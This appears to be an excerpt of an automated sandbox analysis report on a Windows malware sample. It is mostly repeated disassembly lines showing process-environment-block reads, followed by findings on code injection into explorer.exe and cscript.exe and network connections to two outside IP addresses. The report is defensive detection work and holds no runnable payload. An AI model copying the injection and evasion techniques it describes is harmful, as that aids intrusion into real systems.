          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]5_2_0182E507
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183C50D mov eax, dword ptr fs:[00000030h]5_2_0183C50D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183C50D mov eax, dword ptr fs:[00000030h]5_2_0183C50D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov ecx, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov ecx, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]5_2_018AF51B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188C51D mov eax, dword ptr fs:[00000030h]5_2_0188C51D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]5_2_01821514
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183F523 mov eax, dword ptr fs:[00000030h]5_2_0183F523
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01831527 mov eax, dword ptr fs:[00000030h]5_2_01831527
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]5_2_0181252B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01803536 mov eax, dword ptr fs:[00000030h]5_2_01803536
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01803536 mov eax, dword ptr fs:[00000030h]5_2_01803536
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]5_2_017FF5C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842539 mov eax, dword ptr fs:[00000030h]5_2_01842539
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01836540 mov eax, dword ptr fs:[00000030h]5_2_01836540
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838540 mov eax, dword ptr fs:[00000030h]5_2_01838540
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E547 mov eax, dword ptr fs:[00000030h]5_2_0181E547
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180254C mov eax, dword ptr fs:[00000030h]5_2_0180254C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB55F mov eax, dword ptr fs:[00000030h]5_2_018DB55F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB55F mov eax, dword ptr fs:[00000030h]5_2_018DB55F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CA553 mov eax, dword ptr fs:[00000030h]5_2_018CA553
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181C560 mov eax, dword ptr fs:[00000030h]5_2_0181C560
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01800485 mov ecx, dword ptr fs:[00000030h]5_2_01800485
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]5_2_0183648A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]5_2_0183648A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]5_2_0183648A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183B490 mov eax, dword ptr fs:[00000030h]5_2_0183B490
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183B490 mov eax, dword ptr fs:[00000030h]5_2_0183B490
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188C490 mov eax, dword ptr fs:[00000030h]5_2_0188C490
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018024A2 mov eax, dword ptr fs:[00000030h]5_2_018024A2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018024A2 mov ecx, dword ptr fs:[00000030h]5_2_018024A2
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188D4A0 mov ecx, dword ptr fs:[00000030h]5_2_0188D4A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188D4A0 mov eax, dword ptr fs:[00000030h]5_2_0188D4A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188D4A0 mov eax, dword ptr fs:[00000030h]5_2_0188D4A0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018344A8 mov eax, dword ptr fs:[00000030h]5_2_018344A8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E4BC mov eax, dword ptr fs:[00000030h]5_2_0183E4BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]5_2_018214C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]5_2_018214C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]5_2_018214C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]5_2_018214C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]5_2_018214C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]5_2_0182F4D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018244D1 mov eax, dword ptr fs:[00000030h]5_2_018244D1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018244D1 mov eax, dword ptr fs:[00000030h]5_2_018244D1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB420 mov eax, dword ptr fs:[00000030h]5_2_017FB420
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018354E0 mov eax, dword ptr fs:[00000030h]5_2_018354E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E4EF mov eax, dword ptr fs:[00000030h]5_2_0183E4EF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E4EF mov eax, dword ptr fs:[00000030h]5_2_0183E4EF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018064F0 mov eax, dword ptr fs:[00000030h]5_2_018064F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F640D mov eax, dword ptr fs:[00000030h]5_2_017F640D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A4F0 mov eax, dword ptr fs:[00000030h]5_2_0183A4F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A4F0 mov eax, dword ptr fs:[00000030h]5_2_0183A4F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF4FD mov eax, dword ptr fs:[00000030h]5_2_018BF4FD
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018294FA mov eax, dword ptr fs:[00000030h]5_2_018294FA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF409 mov eax, dword ptr fs:[00000030h]5_2_018BF409
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01896400 mov eax, dword ptr fs:[00000030h]5_2_01896400
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01896400 mov eax, dword ptr fs:[00000030h]5_2_01896400
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01889429 mov eax, dword ptr fs:[00000030h]5_2_01889429
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01837425 mov eax, dword ptr fs:[00000030h]5_2_01837425
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01837425 mov ecx, dword ptr fs:[00000030h]5_2_01837425
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]5_2_0188F42F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]5_2_0188F42F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]5_2_0188F42F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]5_2_0188F42F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]5_2_0188F42F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]5_2_01810445
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880443 mov eax, dword ptr fs:[00000030h]5_2_01880443
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D450 mov eax, dword ptr fs:[00000030h]5_2_0183D450
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D450 mov eax, dword ptr fs:[00000030h]5_2_0183D450
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]5_2_0180D454
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]5_2_0182E45E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]5_2_0182E45E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]5_2_0182E45E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]5_2_0182E45E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]5_2_0182E45E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CA464 mov eax, dword ptr fs:[00000030h]5_2_018CA464
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01808470 mov eax, dword ptr fs:[00000030h]5_2_01808470
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01808470 mov eax, dword ptr fs:[00000030h]5_2_01808470
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF478 mov eax, dword ptr fs:[00000030h]5_2_018BF478
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB781 mov eax, dword ptr fs:[00000030h]5_2_018DB781
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB781 mov eax, dword ptr fs:[00000030h]5_2_018DB781
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01831796 mov eax, dword ptr fs:[00000030h]5_2_01831796
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01831796 mov eax, dword ptr fs:[00000030h]5_2_01831796
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]5_2_0187E79D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]5_2_017FF75B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018007A7 mov eax, dword ptr fs:[00000030h]5_2_018007A7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]5_2_018CD7A7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]5_2_018CD7A7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]5_2_018CD7A7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D17BC mov eax, dword ptr fs:[00000030h]5_2_018D17BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF7CF mov eax, dword ptr fs:[00000030h]5_2_018BF7CF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182E7E0 mov eax, dword ptr fs:[00000030h]5_2_0182E7E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]5_2_018037E4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018077F9 mov eax, dword ptr fs:[00000030h]5_2_018077F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018077F9 mov eax, dword ptr fs:[00000030h]5_2_018077F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]5_2_017FB705
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]5_2_017FB705
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]5_2_017FB705
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]5_2_017FB705
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180D700 mov ecx, dword ptr fs:[00000030h]5_2_0180D700
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C970B mov eax, dword ptr fs:[00000030h]5_2_018C970B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C970B mov eax, dword ptr fs:[00000030h]5_2_018C970B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]5_2_0182270D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]5_2_0182270D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]5_2_0182270D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180471B mov eax, dword ptr fs:[00000030h]5_2_0180471B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180471B mov eax, dword ptr fs:[00000030h]5_2_0180471B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF717 mov eax, dword ptr fs:[00000030h]5_2_018BF717
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01829723 mov eax, dword ptr fs:[00000030h]5_2_01829723
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01833740 mov eax, dword ptr fs:[00000030h]5_2_01833740
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188174B mov eax, dword ptr fs:[00000030h]5_2_0188174B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040647E GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,7_2_0040647E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040DCAA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040DCAA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.182.124 80Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory written: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
